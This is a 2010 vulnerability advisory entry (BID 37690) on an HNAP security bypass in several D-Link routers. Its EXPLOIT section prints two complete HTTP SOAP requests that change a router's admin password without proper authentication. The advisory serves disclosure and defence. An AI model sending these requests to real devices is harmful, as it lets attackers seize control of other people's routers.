ID
VAR-E-201001-1162
TITLE
D-Link Multiple Routers HNAP Protocol Security Bypass Vulnerability
Trust: 0.3
DESCRIPTION
Multiple D-Link routers are prone to a security-bypass vulnerability.
Remote attackers can exploit this issue to bypass security restrictions and access certain administrative functions.
This issue affects the following routers:
DI-524
DIR-628
DIR-655
Trust: 0.3
AFFECTED PRODUCTS
vendor: | d link | model: | dir-655 | scope: | eq | version: | 0 | Trust: 0.3 |
vendor: | d link | model: | dir-628 | scope: | eq | version: | 0 | Trust: 0.3 |
vendor: | d link | model: | di-524 | scope: | eq | version: | 0 | Trust: 0.3 |
EXPLOIT
An attacker can exploit this issue by using readily available network utilities.
The following example requests are available:
Example 1:
POST /HNAP1/ HTTP/1.1
Host: 192.168.0.1:8099
SOAPAction: "http://purenetworks.com/HNAP1/GetDeviceSettings"
Content-Length: 453
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<soap:Body>
<SetDeviceSettings xmlns="http://purenetworks.com/HNAP1/">
<AdminPassword>testing123</AdminPassword>
</SetDeviceSettings>
</soap:Body>
</soap:Envelope>
Example 2:
POST /HNAP1/ HTTP/1.1
Authorization: Basic dXNlcjo=
Host: 192.168.0.1
SOAPAction: "http://purenetworks.com/HNAP1/SetDeviceSettings"
Content-Length: 453
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<soap:Body>
<SetDeviceSettings xmlns="http://purenetworks.com/HNAP1/">
<AdminPassword>testing123</AdminPassword>
</SetDeviceSettings>
</soap:Body>
</soap:Envelope>
Trust: 0.3
PRICE
Free
Trust: 0.3
TYPE
Design Error
Trust: 0.3
CREDITS
SourceSec Security Research
Trust: 0.3
EXTERNAL IDS
db: | BID | id: | 37690 | Trust: 0.3 |
REFERENCES
url: | http://www.sourcesec.com/lab/dlink_hnap_captcha.pdf | Trust: 0.3 |
url: | http://www.dlink.com/ | Trust: 0.3 |
SOURCES
db: | BID | id: | 37690 |
LAST UPDATE DATE
2022-07-27T09:55:00.611000+00:00
SOURCES UPDATE DATE
db: | BID | id: | 37690 | date: | 2010-01-11T17:51:00 |
SOURCES RELEASE DATE
db: | BID | id: | 37690 | date: | 2010-01-09T00:00:00 |